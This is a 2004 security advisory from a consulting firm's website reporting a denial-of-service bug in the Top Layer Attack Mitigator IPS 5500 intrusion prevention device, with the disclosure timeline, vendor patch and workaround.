Company

Technical Security Consulting

Managing Risk

Research & Development

Forensics

Security Management

Media Centre

PCI DSS

• Home
• Overview
• R&D Services
• Technology Focus
• Messaging Systems Security
• Embedded Systems Security
• Collaborative Research Projects
• Technical Whitepapers
• Research Briefings
• Publicly Released Tools
• Vendor Alerts - 0days
• Security Advisories
• Advisories
• Advisory 028
• Advisory 027
• Advisory 026
• Advisory 025
• Advisory 024
• Advisory 023
• Advisory 022
• Advisory 021
• Advisory 020
• Advisory 019
• Advisory 018
• Advisory 017
• Advisory 016
• Advisory 015
• Advisory 014
• Advisory 013
• Advisory 012
• Advisory 011
• Advisory 010
• Advisory 009
• Advisory 008
• Advisory 007
• Advisory 006
• Advisory 005
• Advisory 004
• Advisory 003
• Advisory 002
• Advisory 001

Advisory 010

Top Layer Attack Mitigator IPS 5500 Denial of Service

Problem discovered: July 22nd 2004
Vendor contacted: July 23rd 2004
Advisory published: August 25th 2004

Abstract:
Top Layer's Attack Mitigator IPS 5500 is an ASIC-based Network Intrusion Prevention System (NIPS), with blocking and control capabilities against certain types of cyber attacks. The product's datasheet states that 'Top Layer's second-generation ASIC technology and patented algorithms integrate proven stateful analysis techniques with its new ' TopInspect ' deep packet inspection technology and industry-leading DoS attack protection to provide comprehensive protection from Internet-based and internal threats'.

During a recent security consultancy engagement, IRM discovered that under certain specific circumstances the Top Layer IPS 5500 series CPU usage could reach 100% utilisation , where it would not be able to process further network traffic, and any site protected by the device would become inaccessible.

Description:
The system under test comprised a web server farm accessible via a load balancer and protected by an IPS 5500 device. IRM discovered that upon simulating more than 2000 concurrent HTTP requests to the server farm, the IPS 5500 device reached a state where it was utilising all its CPU power and therefore was unable to process standard HTTP traffic.

Tested Versions:
Top Layer Attack Mitigator IPS 5500 running software version 3.11.008

Vendor Response:
Top Layer was notified of this issue on July 22, 2004 by IRM. A bug exists in Attack Mitigator IPS 5500 software versions earlier than V3.11.014 that could cause the IPS 5500 device to incorrectly enter an overload protection mode and negatively impact network traffic. In extreme cases, this can cause a denial of service condition. The effect of this bug appears only when the IPS 5500 unit is configured in a topology where a high-volume of network packets traverse the IPS unit twice due to a "one-armed" routing configuration.

The presence of this error condition will exhibit the following when viewing the IPS5500 Immediate Security Report: Current System Processor Utilization = 100% and the value for System CPU Overload Protection is non-zero.

Vendor & Patch Information:
Top Layer were contacted during the testing and immediately started investigating the issue. Top Layer then updated the IPS code (to version 3.11.014) which resolved the issue during the timescales of the security engagement. The latest IPS 5500 software is available from Top Layer at: http://www.toplayer.com/content/support/tech_assist/index.jsp

Workarounds:
Top Layer explained that a workaround would be to avoid deploying an IPS 5500 in "one-armed" router configurations.

Credits:
Research & Advisory: M Faour, L Garman

Disclaimer:
All information in this advisory is provided on an 'as is' basis in the hope that it will be useful. Information Risk Management Plc is not responsible for any risks or occurrences caused by the application of this information.